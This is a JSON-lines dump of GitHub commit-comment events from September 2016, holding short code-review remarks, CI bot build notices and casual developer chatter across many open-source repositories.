{"id":"4522016252","type":"CommitCommentEvent","actor":{"login":"jdalton"},"repo":{"name":"lodash/lodash.github.io"},"payload":{"comment":{"id":18913175,"position":null,"line":null,"path":null,"commit_id":"3b7663ff790eee74f3ac00fee613af3fcfc2f03e","created_at":"2016-09-06T15:24:36Z","updated_at":"2016-09-06T15:24:36Z","body":"\\cc @zackhall.\r\n\r\nI also noticed that on the menu icon line breaks below the header on safari mobile."}},"created_at":"2016-09-06T15:24:36Z"}
{"id":"4522016651","type":"CommitCommentEvent","actor":{"login":"ejsmith"},"repo":{"name":"exceptionless/Foundatio.Repositories"},"payload":{"comment":{"id":18913176,"position":5,"line":88,"path":"src/Elasticsearch/Repositories/ElasticRepositoryBase.cs","commit_id":"2d5db085dc7ea2620607011366047718dfee3f3b","created_at":"2016-09-06T15:24:40Z","updated_at":"2016-09-06T15:24:40Z","body":"Yes, I looked quickly. Feel free to try and find more."}},"created_at":"2016-09-06T15:24:40Z"}
{"id":"4522019070","type":"CommitCommentEvent","actor":{"login":"ejsmith"},"repo":{"name":"exceptionless/Foundatio.Repositories"},"payload":{"comment":{"id":18913181,"position":50,"line":229,"path":"src/Elasticsearch/Repositories/ElasticReadOnlyRepositoryBase.cs","commit_id":"2d5db085dc7ea2620607011366047718dfee3f3b","created_at":"2016-09-06T15:25:04Z","updated_at":"2016-09-06T15:25:04Z","body":"Not sure, see if you can simplify it."}},"created_at":"2016-09-06T15:25:04Z"}
{"id":"4522020142","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/balrog-ui"},"payload":{"comment":{"id":18913184,"position":null,"line":null,"path":null,"commit_id":"923a441f2ddf681426fae74dd17d77923cf95d8a","created_at":"2016-09-06T15:25:15Z","updated_at":"2016-09-06T15:25:15Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#UWbOWI03TKeuCkjDhDmBdw"}},"created_at":"2016-09-06T15:25:15Z"}
{"id":"4522021486","type":"CommitCommentEvent","actor":{"login":"zijistark"},"repo":{"name":"EMFTeam/HIP-tools"},"payload":{"comment":{"id":18913192,"position":71,"line":611,"path":"installer/main.py","commit_id":"4ccb77b32900adb0552a6d9d4fb030e896aadfb9","created_at":"2016-09-06T15:25:26Z","updated_at":"2016-09-06T15:25:26Z","body":"also, we might need to do platform-independent pathname normalization from whatever's in the manifest. different path separators might lead to a diff platform (such as HIP.exe itself vs. cygwin main.py) comparing a different path string to what's stored in the manifest."}},"created_at":"2016-09-06T15:25:26Z"}
{"id":"4522025886","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/balrog-ui"},"payload":{"comment":{"id":18913200,"position":null,"line":null,"path":null,"commit_id":"9c36f990e2a30f637c749d95dd10c6da487338bb","created_at":"2016-09-06T15:26:10Z","updated_at":"2016-09-06T15:26:10Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#QAjb-irIRiunlSoLDivhaw"}},"created_at":"2016-09-06T15:26:10Z"}
{"id":"4522026297","type":"CommitCommentEvent","actor":{"login":"zijistark"},"repo":{"name":"EMFTeam/HIP-tools"},"payload":{"comment":{"id":18913201,"position":71,"line":611,"path":"installer/main.py","commit_id":"4ccb77b32900adb0552a6d9d4fb030e896aadfb9","created_at":"2016-09-06T15:26:14Z","updated_at":"2016-09-06T15:26:14Z","body":"when they are canonically equivalent, that is."}},"created_at":"2016-09-06T15:26:14Z"}
{"id":"4522026509","type":"CommitCommentEvent","actor":{"login":"escalonn"},"repo":{"name":"EMFTeam/HIP-tools"},"payload":{"comment":{"id":18913203,"position":34,"line":450,"path":"installer/main.py","commit_id":"4ccb77b32900adb0552a6d9d4fb030e896aadfb9","created_at":"2016-09-06T15:26:16Z","updated_at":"2016-09-06T15:26:16Z","body":"nah - only `length` is changed. `buf` still contains the whole file always"}},"created_at":"2016-09-06T15:26:16Z"}
{"id":"4522027942","type":"CommitCommentEvent","actor":{"login":"Krystade"},"repo":{"name":"Krystade/Choose-your-own-adventure"},"payload":{"comment":{"id":18913207,"position":null,"line":null,"path":null,"commit_id":"bba09f88fdfea8378e12057034973cd586f23e25","created_at":"2016-09-06T15:26:28Z","updated_at":"2016-09-06T15:26:28Z","body":"Making code more readable"}},"created_at":"2016-09-06T15:26:28Z"}
{"id":"4522028712","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/balrog"},"payload":{"comment":{"id":18913211,"position":null,"line":null,"path":null,"commit_id":"e93c3a4e41658b84bc6c8b808d86dec42104bf3e","created_at":"2016-09-06T15:26:35Z","updated_at":"2016-09-06T15:26:35Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#Gq7FO5ucRNGhE_-fqYXGAg"}},"created_at":"2016-09-06T15:26:35Z"}
{"id":"4522043217","type":"CommitCommentEvent","actor":{"login":"LouisGac"},"repo":{"name":"Shnoulle/LimeSurvey-Shnoulle"},"payload":{"comment":{"id":18913240,"position":null,"line":null,"path":null,"commit_id":"2d65afb60d43a71475d598a2ac5cbc3bf205dc90","created_at":"2016-09-06T15:28:53Z","updated_at":"2016-09-06T15:28:53Z","body":"The problem now is that we can't update anymore awesome-bootstrap-checkbox.\r\nwhat do we gain by removing the radio class? "}},"created_at":"2016-09-06T15:28:53Z"}
{"id":"4522044017","type":"CommitCommentEvent","actor":{"login":"P3pp3rF1y"},"repo":{"name":"P3pp3rF1y/Reliquary"},"payload":{"comment":{"id":18913246,"position":null,"line":null,"path":null,"commit_id":"7764c1d0804868c047b89bf561e906f33e2e96eb","created_at":"2016-09-06T15:29:01Z","updated_at":"2016-09-06T15:29:01Z","body":"#Fixes #65 "}},"created_at":"2016-09-06T15:29:01Z"}
{"id":"4522044466","type":"CommitCommentEvent","actor":{"login":"b-lux"},"repo":{"name":"b-lux/hello-world"},"payload":{"comment":{"id":18913249,"position":null,"line":null,"path":null,"commit_id":"eac539bc200030e4f4eec8b8ba5f375cc4d8e950","created_at":"2016-09-06T15:29:06Z","updated_at":"2016-09-06T15:29:06Z","body":"Hi there \r\nWhat's up?"}},"created_at":"2016-09-06T15:29:06Z"}
{"id":"4522048950","type":"CommitCommentEvent","actor":{"login":"zijistark"},"repo":{"name":"EMFTeam/HIP-tools"},"payload":{"comment":{"id":18913261,"position":34,"line":450,"path":"installer/main.py","commit_id":"4ccb77b32900adb0552a6d9d4fb030e896aadfb9","created_at":"2016-09-06T15:29:48Z","updated_at":"2016-09-06T15:29:48Z","body":"right, but you are letting `unwrapBuffer` unencrypt at least part of `buf` before you update the hash.  the checksums stored in the manifest are post-encryption."}},"created_at":"2016-09-06T15:29:48Z"}
{"id":"4522050679","type":"CommitCommentEvent","actor":{"login":"LouisGac"},"repo":{"name":"Shnoulle/LimeSurvey-Shnoulle"},"payload":{"comment":{"id":18913264,"position":null,"line":null,"path":null,"commit_id":"f3c27a540f1be965e2457faa8249d0e4f52653f4","created_at":"2016-09-06T15:30:06Z","updated_at":"2016-09-06T15:30:06Z","body":"a very simple and very good change. "}},"created_at":"2016-09-06T15:30:06Z"}
{"id":"4522050848","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18913265,"position":null,"line":null,"path":null,"commit_id":"eb8b5edfbab695e0568a93cb5b1e965b7c18fe16","created_at":"2016-09-06T15:30:08Z","updated_at":"2016-09-06T15:30:08Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 931](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12743&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-06T15:30:08Z"}
{"id":"4522051953","type":"CommitCommentEvent","actor":{"login":"b-lux"},"repo":{"name":"b-lux/hello-world"},"payload":{"comment":{"id":18913270,"position":2,"line":2,"path":"README.md","commit_id":"eac539bc200030e4f4eec8b8ba5f375cc4d8e950","created_at":"2016-09-06T15:30:19Z","updated_at":"2016-09-06T15:30:19Z","body":"Hi there,\r\nWhat up"}},"created_at":"2016-09-06T15:30:19Z"}
{"id":"4522052775","type":"CommitCommentEvent","actor":{"login":"janpanschab"},"repo":{"name":"actum/gulp-dev-stack"},"payload":{"comment":{"id":18913272,"position":14,"line":20,"path":"src/app/components/alertifier.js","commit_id":"f1e7329b12eb7b4a3b0fcc6516702d2b378f2f80","created_at":"2016-09-06T15:30:27Z","updated_at":"2016-09-06T15:30:27Z","body":"I’m not sure if this change is because of the new eslint rules, but I don’t want to use combined declarations. I like this article http://benalman.com/news/2012/05/multiple-var-statements-javascript/"}},"created_at":"2016-09-06T15:30:27Z"}
{"id":"4522052866","type":"CommitCommentEvent","actor":{"login":"fatalbanana"},"repo":{"name":"fatalbanana/rspamd"},"payload":{"comment":{"id":18913273,"position":131,"line":655,"path":"src/plugins/dkim_check.c","commit_id":"101bd383fda6a2b212f502c5d5793b84e9564ce7","created_at":"2016-09-06T15:30:28Z","updated_at":"2016-09-06T15:30:28Z","body":"It seems I really did - thank you. :)"}},"created_at":"2016-09-06T15:30:28Z"}
{"id":"4522053017","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18913274,"position":null,"line":null,"path":null,"commit_id":"2811dcc19c21802ce50d483e544f1baec0e064c8","created_at":"2016-09-06T15:30:29Z","updated_at":"2016-09-06T15:30:29Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 930](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12738&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 237, ignored: 3 Build time: 00:08:52"}},"created_at":"2016-09-06T15:30:29Z"}
{"id":"4522054068","type":"CommitCommentEvent","actor":{"login":"JoinRajuncraftNow"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18913278,"position":null,"line":null,"path":null,"commit_id":"6dbe42fb65f4e6fd54d40993ab6d88c145b7693d","created_at":"2016-09-06T15:30:38Z","updated_at":"2016-09-06T15:30:38Z","body":"It gets stuck at the enemy preparing to attack, and doesn't loop, even though it should because both heath and ehealth are above 0."}},"created_at":"2016-09-06T15:30:38Z"}
{"id":"4522058003","type":"CommitCommentEvent","actor":{"login":"escalonn"},"repo":{"name":"EMFTeam/HIP-tools"},"payload":{"comment":{"id":18913282,"position":34,"line":450,"path":"installer/main.py","commit_id":"4ccb77b32900adb0552a6d9d4fb030e896aadfb9","created_at":"2016-09-06T15:31:16Z","updated_at":"2016-09-06T15:31:16Z","body":"oh, i had assumed you did it the other way for some reason."}},"created_at":"2016-09-06T15:31:16Z"}
{"id":"4522058528","type":"CommitCommentEvent","actor":{"login":"zwliew"},"repo":{"name":"CyanogenMod/android_device_samsung_serrano-common"},"payload":{"comment":{"id":18913283,"position":null,"line":null,"path":null,"commit_id":"2d7db29707ed70e925be719ac3330fc7628d9ffa","created_at":"2016-09-06T15:31:21Z","updated_at":"2016-09-06T15:31:21Z","body":"may i know why this was removed?"}},"created_at":"2016-09-06T15:31:21Z"}
{"id":"4522060356","type":"CommitCommentEvent","actor":{"login":"escalonn"},"repo":{"name":"EMFTeam/HIP-tools"},"payload":{"comment":{"id":18913289,"position":71,"line":611,"path":"installer/main.py","commit_id":"4ccb77b32900adb0552a6d9d4fb030e896aadfb9","created_at":"2016-09-06T15:31:38Z","updated_at":"2016-09-06T15:31:38Z","body":"looks like os.path.normpath and/or os.path.normcase might work?"}},"created_at":"2016-09-06T15:31:38Z"}
{"id":"4522060911","type":"CommitCommentEvent","actor":{"login":"janpanschab"},"repo":{"name":"actum/gulp-dev-stack"},"payload":{"comment":{"id":18913291,"position":23,"line":28,"path":"src/app/components/alertifier.js","commit_id":"f1e7329b12eb7b4a3b0fcc6516702d2b378f2f80","created_at":"2016-09-06T15:31:43Z","updated_at":"2016-09-06T15:31:43Z","body":"Empty lines are also from airbnb styleguide?"}},"created_at":"2016-09-06T15:31:43Z"}
{"id":"4522063393","type":"CommitCommentEvent","actor":{"login":"jwandrews"},"repo":{"name":"carpages/gemini-css"},"payload":{"comment":{"id":18913294,"position":9,"line":24,"path":"objects/_pagination.scss","commit_id":"6f399518ced70e07f3d2ba674f5f75e34d1ec4af","created_at":"2016-09-06T15:32:08Z","updated_at":"2016-09-06T15:32:08Z","body":"@mattdrose tested in Chrome, Safari, Firefox & IE9. Alignment / spacing is consistent across all tested browsers. I have a feeling that the word-spacing and the letter-spacing were trying to solve the same problem and duplicating the adjustment which was causing the padding on the anchor to overlap and cause a bug when trying to hit the correct page link."}},"created_at":"2016-09-06T15:32:08Z"}
{"id":"4522063696","type":"CommitCommentEvent","actor":{"login":"tuckerwales"},"repo":{"name":"FacileAudio/facile"},"payload":{"comment":{"id":18913295,"position":null,"line":null,"path":null,"commit_id":"6245594726c8c16b3f3e329b53e03266120d874e","created_at":"2016-09-06T15:32:11Z","updated_at":"2016-09-06T15:32:11Z","body":"Just wanted to say, great job on this!\r\n\r\nI think I'm going to have a play around on the weekend and see what I can use this for :)"}},"created_at":"2016-09-06T15:32:11Z"}
{"id":"4522064052","type":"CommitCommentEvent","actor":{"login":"aaannz"},"repo":{"name":"os-autoinst/os-autoinst"},"payload":{"comment":{"id":18913297,"position":null,"line":null,"path":null,"commit_id":"41ebf9fb4198d021f3710be7e58aea3df448c0a2","created_at":"2016-09-06T15:32:14Z","updated_at":"2016-09-06T15:32:14Z","body":"Warnings should be fixed by #581"}},"created_at":"2016-09-06T15:32:14Z"}
{"id":"4522067159","type":"CommitCommentEvent","actor":{"login":"LouisGac"},"repo":{"name":"Shnoulle/LimeSurvey-Shnoulle"},"payload":{"comment":{"id":18913305,"position":null,"line":null,"path":null,"commit_id":"89922b10f6956963351bc6cc66fb6232b204b62a","created_at":"2016-09-06T15:32:44Z","updated_at":"2016-09-06T15:32:44Z","body":"also, ui-icons are not responsive, so they should not be used at all. "}},"created_at":"2016-09-06T15:32:44Z"}
{"id":"4522068976","type":"CommitCommentEvent","actor":{"login":"rufer7"},"repo":{"name":"dfensgmbh/biz.dfch.PS.Appclusive.Client"},"payload":{"comment":{"id":18913314,"position":38,"line":139,"path":"it/KeyNameValue.Tests.ps1","commit_id":"8430ccfe9fcafd7ca07b4ab35788bf4cd8406539","created_at":"2016-09-06T15:33:04Z","updated_at":"2016-09-06T15:33:04Z","body":"@pbimpisidis as the message already expresses the invkcation of the Cmdlet fails becauss you try to update a `KeyNameValue` entry that does not yet exist...means loading the `KeyNameValue` entry failed. I suggest checking the http requests in Fiddler to verify what exactly happens.\r\n"}},"created_at":"2016-09-06T15:33:04Z"}
{"id":"4522074361","type":"CommitCommentEvent","actor":{"login":"JoinRajuncraftNow"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18913322,"position":null,"line":null,"path":null,"commit_id":"6dbe42fb65f4e6fd54d40993ab6d88c145b7693d","created_at":"2016-09-06T15:33:57Z","updated_at":"2016-09-06T15:33:57Z","body":"I SEE\r\nI AM SO STUPID"}},"created_at":"2016-09-06T15:33:57Z"}
{"id":"4522075416","type":"CommitCommentEvent","actor":{"login":"atsepkov"},"repo":{"name":"atsepkov/RapydScript"},"payload":{"comment":{"id":18913325,"position":null,"line":null,"path":null,"commit_id":"570afe14bffe2604ffda0f1f21d46a92add5838d","created_at":"2016-09-06T15:34:08Z","updated_at":"2016-09-06T15:34:08Z","body":"I see what you mean now, misread the original statement and thought you were talking about the keys themselves rather than the prototype chain. Wouldn't a typical object the users use `len()` on be instantiated via {} and hence its only prototype would be Object itself?\r\n\r\np.s. I have also expanded the hash out to 100k keys and now seeing the reverse effect (perhaps they're not both linear operations as I first thought), so I'll revert back to Object.keys().length."}},"created_at":"2016-09-06T15:34:08Z"}
{"id":"4522077403","type":"CommitCommentEvent","actor":{"login":"escalonn"},"repo":{"name":"EMFTeam/HIP-tools"},"payload":{"comment":{"id":18913328,"position":71,"line":611,"path":"installer/main.py","commit_id":"4ccb77b32900adb0552a6d9d4fb030e896aadfb9","created_at":"2016-09-06T15:34:27Z","updated_at":"2016-09-06T15:34:27Z","body":"and os.path.realpath... :/"}},"created_at":"2016-09-06T15:34:27Z"}
{"id":"4522081465","type":"CommitCommentEvent","actor":{"login":"rufer7"},"repo":{"name":"dfensgmbh/biz.dfch.PS.Appclusive.Client"},"payload":{"comment":{"id":18913333,"position":38,"line":139,"path":"it/KeyNameValue.Tests.ps1","commit_id":"8430ccfe9fcafd7ca07b4ab35788bf4cd8406539","created_at":"2016-09-06T15:35:07Z","updated_at":"2016-09-06T15:35:07Z","body":"@pbimpisidis I checked the code and found `$keyNameValueExists` only in `Remove-KeyNameValue`. My assumption is that you try to delete an entity with Key1 that does not exist anymore as you changed the key to Key2"}},"created_at":"2016-09-06T15:35:07Z"}
{"id":"4522085013","type":"CommitCommentEvent","actor":{"login":"wdlkmpx"},"repo":{"name":"puppylinux-woof-CE/woof-CE"},"payload":{"comment":{"id":18913343,"position":null,"line":null,"path":null,"commit_id":"4899eab685b79e33e7a1fe00ca5a260d54e4ea7f","created_at":"2016-09-06T15:35:40Z","updated_at":"2016-09-06T15:35:40Z","body":"sorry. i fixed this with a rebase..\n"}},"created_at":"2016-09-06T15:35:40Z"}
{"id":"4522086894","type":"CommitCommentEvent","actor":{"login":"iluxa-com"},"repo":{"name":"iluxa-com/demo"},"payload":{"comment":{"id":18913346,"position":8,"line":0,"path":".idea/libraries/log4j_1_2_16.xml","commit_id":"9e153bd7fe728438492c971a974f34fd1e54b811","created_at":"2016-09-06T15:35:57Z","updated_at":"2016-09-06T15:35:57Z","body":"UP line 8"}},"created_at":"2016-09-06T15:35:57Z"}
{"id":"4522088282","type":"CommitCommentEvent","actor":{"login":"jlecoeur"},"repo":{"name":"lis-epfl/MAVRIC_Library"},"payload":{"comment":{"id":18913349,"position":null,"line":null,"path":null,"commit_id":"39f5e7291eeaa26dd5781c268c050689eb75a522","created_at":"2016-09-06T15:36:12Z","updated_at":"2016-09-06T15:36:12Z","body":"Watch out, these are uint16_t.\r\nIt would be better to write 62, the pulse width will go from 0us to 124us (0% to 49.6%)"}},"created_at":"2016-09-06T15:36:12Z"}
{"id":"4522089152","type":"CommitCommentEvent","actor":{"login":"jgribonvald"},"repo":{"name":"Jasig/cas-proxy-test-portlet"},"payload":{"comment":{"id":18913354,"position":null,"line":null,"path":null,"commit_id":"d7673b7212fd9fa01e14d2fddfd42df17b19a0ce","created_at":"2016-09-06T15:36:20Z","updated_at":"2016-09-06T15:36:20Z","body":"Sorry James I didn't see that I changed import lib order, from eclipse the order of javax should be in first place ;)"}},"created_at":"2016-09-06T15:36:20Z"}
{"id":"4522089730","type":"CommitCommentEvent","actor":{"login":"wdlkmpx"},"repo":{"name":"puppylinux-woof-CE/woof-CE"},"payload":{"comment":{"id":18913356,"position":null,"line":null,"path":null,"commit_id":"4899eab685b79e33e7a1fe00ca5a260d54e4ea7f","created_at":"2016-09-06T15:36:26Z","updated_at":"2016-09-06T15:36:26Z","body":"i mean only the authorship\n"}},"created_at":"2016-09-06T15:36:26Z"}
{"id":"4522092273","type":"CommitCommentEvent","actor":{"login":"iluxa-com"},"repo":{"name":"iluxa-com/demo"},"payload":{"comment":{"id":18913362,"position":2,"line":0,"path":"demoProject.iml","commit_id":"9e153bd7fe728438492c971a974f34fd1e54b811","created_at":"2016-09-06T15:36:49Z","updated_at":"2016-09-06T15:36:49Z","body":"line 17"}},"created_at":"2016-09-06T15:36:49Z"}
{"id":"4522095097","type":"CommitCommentEvent","actor":{"login":"LouisGac"},"repo":{"name":"Shnoulle/LimeSurvey-Shnoulle"},"payload":{"comment":{"id":18913373,"position":null,"line":null,"path":null,"commit_id":"0cc1b232005d5c85f2150453657af14dc2c10cf7","created_at":"2016-09-06T15:37:18Z","updated_at":"2016-09-06T15:37:18Z","body":"I'm not sure to understand why is this an improvement?\r\nI mean: replacing a h3 by a div with a class is like the exact contrary of the goal right? "}},"created_at":"2016-09-06T15:37:18Z"}
{"id":"4522100123","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18913389,"position":null,"line":null,"path":null,"commit_id":"eb8b5edfbab695e0568a93cb5b1e965b7c18fe16","created_at":"2016-09-06T15:38:08Z","updated_at":"2016-09-06T15:38:08Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 931](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12743&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 237, ignored: 3 Build time: 00:08:01"}},"created_at":"2016-09-06T15:38:08Z"}
{"id":"4522105908","type":"CommitCommentEvent","actor":{"login":"zijistark"},"repo":{"name":"EMFTeam/EMF"},"payload":{"comment":{"id":18913401,"position":1,"line":1,"path":"EMF/events/emf_not_viet_events.txt","commit_id":"6623c379aef7bb724f679c73cb6e26bb0d6978f0","created_at":"2016-09-06T15:39:06Z","updated_at":"2016-09-06T15:39:06Z","body":"`emf_not_viet` is probably namespace enough for the whole thing (can share that among multiple files).  while we've got plenty of event ID space for namespaces (100,000 per namespace), they shouldn't be used quite this specifically."}},"created_at":"2016-09-06T15:39:06Z"}
{"id":"4522107968","type":"CommitCommentEvent","actor":{"login":"fr34kyn01535"},"repo":{"name":"RocketModPlugins/ReservedSlots"},"payload":{"comment":{"id":18913404,"position":null,"line":null,"path":null,"commit_id":"d32f1dcafeb2cabb749260d6d265f3f4b8cba614","created_at":"2016-09-06T15:39:25Z","updated_at":"2016-09-06T15:39:25Z","body":"Dont change the directory from \"lib\" to something else, the build server is using this directory and replaces all libs with the newest libs automatically before the builds.."}},"created_at":"2016-09-06T15:39:25Z"}
{"id":"4522108544","type":"CommitCommentEvent","actor":{"login":"lucabrivio"},"repo":{"name":"lucabrivio/Stockfish"},"payload":{"comment":{"id":18913406,"position":null,"line":null,"path":null,"commit_id":"277a096add6b74ff533425f005f183dc6b2839a8","created_at":"2016-09-06T15:39:31Z","updated_at":"2016-09-06T15:39:31Z","body":"If this fails I will try to compensate in queen value or PSQT..."}},"created_at":"2016-09-06T15:39:31Z"}
{"id":"4522111186","type":"CommitCommentEvent","actor":{"login":"killerwife"},"repo":{"name":"cmangos/mangos-wotlk"},"payload":{"comment":{"id":18913409,"position":20,"line":1105,"path":"src/game/AI/CreatureEventAI.cpp","commit_id":"4e887248518c59ef5f418a6cc6fc9e880aee12b6","created_at":"2016-09-06T15:39:53Z","updated_at":"2016-09-06T15:39:53Z","body":"@boxa Alright, so, the issue stems from my fix approach. Issue is that this was previously done in enter combat by setting to 0. I will ponder the logic and will fix it appropriately today."}},"created_at":"2016-09-06T15:39:53Z"}
{"id":"4522111494","type":"CommitCommentEvent","actor":{"login":"pmauduit"},"repo":{"name":"georchestra/georchestra"},"payload":{"comment":{"id":18913411,"position":null,"line":null,"path":null,"commit_id":"c3b4b87f6b7a314792da20cb61e38136cfe5ee16","created_at":"2016-09-06T15:39:56Z","updated_at":"2016-09-06T15:39:56Z","body":"After a second read, I wonder if it would fit in case of connected user that are not administrator"}},"created_at":"2016-09-06T15:39:56Z"}
{"id":"4522111850","type":"CommitCommentEvent","actor":{"login":"cpriouzeau"},"repo":{"name":"cpriouzeau/meta-st-cannes2"},"payload":{"comment":{"id":18913413,"position":null,"line":null,"path":null,"commit_id":"e0e9cfbb4c05b95b4bf3f733528d912c79636253","created_at":"2016-09-06T15:40:00Z","updated_at":"2016-09-06T15:40:00Z","body":"I have updated the krogoth branch to be compliant with multi BSP config."}},"created_at":"2016-09-06T15:40:00Z"}
{"id":"4522112544","type":"CommitCommentEvent","actor":{"login":"felixfbecker"},"repo":{"name":"felixfbecker/merkel"},"payload":{"comment":{"id":18913417,"position":null,"line":null,"path":null,"commit_id":"21a070d20f2f5b113b5c0e44520ae305d4d2c5fe","created_at":"2016-09-06T15:40:07Z","updated_at":"2016-09-06T15:40:07Z","body":"Hab ich doch in https://github.com/felixfbecker/merkel/commit/4184e50b3c7a12a2953388a2d73bca74f97996b4 gefixt?"}},"created_at":"2016-09-06T15:40:07Z"}
{"id":"4522115348","type":"CommitCommentEvent","actor":{"login":"jeff1evesque"},"repo":{"name":"protojas/machine-learning"},"payload":{"comment":{"id":18913423,"position":16,"line":16,"path":"test/manual/authentication/pytest_crypto.py","commit_id":"2a97feb0a59cf6e7de45721c5175663fe6414c39","created_at":"2016-09-06T15:40:31Z","updated_at":"2016-09-06T15:40:31Z","body":"I'd adjust `cryptopath` as follows:\r\n\r\n```python\r\nroot = yaml.load(stream)['general']['root']\r\ncryptopath = root . yaml.load(stream)['crypto']['path']\r\n```\r\n\r\nThis should allow great portability, if something changes in the future."}},"created_at":"2016-09-06T15:40:31Z"}
{"id":"4522117195","type":"CommitCommentEvent","actor":{"login":"plathrop"},"repo":{"name":"Vazkii/BotaniaV2"},"payload":{"comment":{"id":18913426,"position":null,"line":null,"path":null,"commit_id":"dd92eaf8860c54851ad4a45072411f87eda6628f","created_at":"2016-09-06T15:40:46Z","updated_at":"2016-09-06T15:40:46Z","body":"This is exciting!"}},"created_at":"2016-09-06T15:40:46Z"}
{"id":"4522121590","type":"CommitCommentEvent","actor":{"login":"Hostiphre"},"repo":{"name":"Hostiphre/M0921"},"payload":{"comment":{"id":18913433,"position":23,"line":21,"path":"Part_I_State_of_the_Art/12._theory_of_liquids.tex","commit_id":"448511eb45c4ed8544bfc43a6c2e5130f72494a1","created_at":"2016-09-06T15:41:29Z","updated_at":"2016-09-06T15:41:29Z","body":"momenta is not the pleural of momentum?"}},"created_at":"2016-09-06T15:41:29Z"}
{"id":"4522121802","type":"CommitCommentEvent","actor":{"login":"deepu105"},"repo":{"name":"jhipster/generator-jhipster"},"payload":{"comment":{"id":18913434,"position":5,"line":77,"path":"generators/entity/templates/src/test/gatling/simulations/_EntityGatlingTest.scala","commit_id":"4498bfd04025ecddef14438166c139fd6e27db5e","created_at":"2016-09-06T15:41:31Z","updated_at":"2016-09-06T15:41:31Z","body":"@jdubois It takes a regex rite? so may be we should correct regex to avoid this kind of issues in future\r\nso this should be `\"Set-Cookie\",[\\s]?\"CSRF-TOKEN=(.*);[\\s]?[P,p]ath=\\/\"` do you want me to update this?"}},"created_at":"2016-09-06T15:41:31Z"}
{"id":"4522122741","type":"CommitCommentEvent","actor":{"login":"atsepkov"},"repo":{"name":"atsepkov/RapydScript"},"payload":{"comment":{"id":18913435,"position":null,"line":null,"path":null,"commit_id":"570afe14bffe2604ffda0f1f21d46a92add5838d","created_at":"2016-09-06T15:41:40Z","updated_at":"2016-09-06T15:41:40Z","body":"Regarding the indexOf, I still need to do the NodeList update, which I'm waiting on until I finish by DOM-based testing scaffold (otherwise I have no way to even make sure that it works aside from taking other people's word for it). I may end up deciding to revert that implementation as well, but at this time it's not a use case that was driving the decision."}},"created_at":"2016-09-06T15:41:40Z"}
{"id":"4522123908","type":"CommitCommentEvent","actor":{"login":"aserratorta"},"repo":{"name":"Flexible-User-Experience/Espai-Kowo"},"payload":{"comment":{"id":18913441,"position":null,"line":null,"path":null,"commit_id":"249efff7d38bd6c4a690abc77d2809d56143ecb6","created_at":"2016-09-06T15:41:51Z","updated_at":"2016-09-06T15:41:51Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;PraBWyIM&#x2F;36-mail\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Mail</a>"}},"created_at":"2016-09-06T15:41:51Z"}
{"id":"4522125056","type":"CommitCommentEvent","actor":{"login":"hhktony"},"repo":{"name":"Nyr/openvpn-install"},"payload":{"comment":{"id":18913443,"position":null,"line":null,"path":null,"commit_id":"791c54786c2cb2f6500e20f931b33fbb234a8ce4","created_at":"2016-09-06T15:42:02Z","updated_at":"2016-09-06T15:42:02Z","body":"If the `/etc/sysctl.conf` contains `net.ipv4.ip_forward_use_pmtu`"}},"created_at":"2016-09-06T15:42:02Z"}
{"id":"4522125402","type":"CommitCommentEvent","actor":{"login":"jdalton"},"repo":{"name":"lodash/lodash.github.io"},"payload":{"comment":{"id":18913444,"position":null,"line":null,"path":null,"commit_id":"974b59dce7fc76d8c66d5bfd81bb6d79e02d7d16","created_at":"2016-09-06T15:42:06Z","updated_at":"2016-09-06T15:42:06Z","body":"@zackhall\r\nTurns out this didn't cause it.\r\nI'm guessing the work I did to reduce page sizes by 20+kB helped here."}},"created_at":"2016-09-06T15:42:06Z"}
{"id":"4522125693","type":"CommitCommentEvent","actor":{"login":"raxod502"},"repo":{"name":"esiefkas/dotfiles"},"payload":{"comment":{"id":18913446,"position":5,"line":209,"path":".zshrc","commit_id":"702052f56f2ac7fc4764ebff94989d769246fa11","created_at":"2016-09-06T15:42:10Z","updated_at":"2016-09-06T15:42:10Z","body":"I don't particularly like requiring an alias for Emacs, since this means you have to set up Zsh in order to get Emacs to work. In the OSX part of the setup script, I install `emacs` and `emacsw` executables in `/usr/local/bin` that call through to the real executable. This way, there will never be weird problems with shell aliases not being expanded in some contexts, leading to an unexpected graphical Emacs. Plus, you can still launch windowed Emacs if you want (`emacsw`).\r\n\r\nAlso, this should most assuredly be *before* `.zshrc.local` if we keep it."}},"created_at":"2016-09-06T15:42:10Z"}
